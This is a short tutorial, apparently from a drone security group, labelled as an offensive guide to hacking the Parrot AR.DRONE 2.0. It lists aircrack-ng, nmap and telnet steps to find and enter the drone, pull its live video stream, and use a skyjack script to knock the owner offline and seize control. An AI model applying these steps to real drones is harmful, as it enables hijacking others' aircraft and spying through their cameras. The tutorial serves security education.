Tutorial One: Hacking the Parrot AR.DRONE 2.0
This tutorial aims to educate users on the various attack vectors that affect the Parrot AR.DRONE 2.0. It is interesting to note this is one of the most common commercial drones on the market today, and also has one of the weakest protected systems. It is the hope here at DroneSec that the reader will understand the vulnerabilities and be able to secure their own and (hopefully) others too if given the chance.
We believe roles will soon emerge that will see many Drone Security positions open up and it's essential that people understand the fundamental basics at the very least.
Before you start
When approaching a topic like this, it is extremely important to remember that technology builds upon itself - this is not a magical snowflake type of complex hardware/software that requires re-learning. Many of the concepts involved have been driving systems for years. The operating system (OS) is known as BusyBox - a quick google search will show you that it's an embedded linux system used in many places (IoT especially). Which means if you know linux, you know how to navigate the file system of this drone!
Similarly, the communication to the underlying linux system can be made through common connection utilities such as SSH, FTP, Telnet etc; if you can type "telnet 192.168.1.1" you can access the AR 2.0 Drone!
Our 'hacking' steps after gaining access to the filesystem include hijacking the video stream, and the controls of the drone. These take a little more ingenuity but are very doable with just a few commands.
If you do not have access to a physical drone, you may be able to replicate some steps with a BusyBox Linux OS (virtual machine) and a WAP.
Overview:
Technical Commands
There are multiple ways of achieving control over this type of drone! Use as a general guide only, feel free to waver from the path. We have tried not to give everything away, but some items are given as examples. For any issues or help do not hesitate to contact info@dronesec.com.au or join the Facebook or Reddit discussion groups.
This is the offensive guide. A defensive guide is in the works!
Part 1: Detect & Identify
- Insert Wifi Adapter (connect to kali) ((Any will do, we use the TP-Link TL-WN722N, but any small one should do with monitor mode))
- ifconfig
- iwconfig (e.g. wlan0) (if not detected, switch USB ports and connect again)
- pkill NetworkManager
- airmon-ng check
- airmon-ng check kill
- airmon-ng start wlan0 1 (e.g. might become mon0)
- iwconfig (check here for the new monitoring adapter name)
- airodump-ng mon0
- Check for ARdrone wifi - and note channel.
- Check MAC addresses to determine the correct Drone AP
Part 2: Gain Access
- After identifying the correct AP, you’ll want to connect to it via wifi. Before though:
- airmon-ng stop mon0
- service network-manager start
- Connect to arDrone wifi
- Ifconfig (to find ipaddress/gateway)
- Perform an nmap scan against the drone
- Identify the ports and attempt to gain filesystem access (telnet)
- Navigate the filesystem to find the Drone Software Version
- pkill NetworkManager again and start your adapter in monitor mode
Part 3: Active Decode
- Ensure the correct drone has been identified (Part 2)
- Maintain access to the drone via telnet
- Use ffmpeg, ffplay or tcpdump to gain access to a live stream
- E.g. ffplay http://192.168.1.1:5555 (as port 5555 is used for video transmission)
Part 4: Intercept & Control
- Find and download the skyjack script or Jeff script.
- Attempt to gain access, knock the controller offline, and take control of live camera feed.
- ???
- Profit
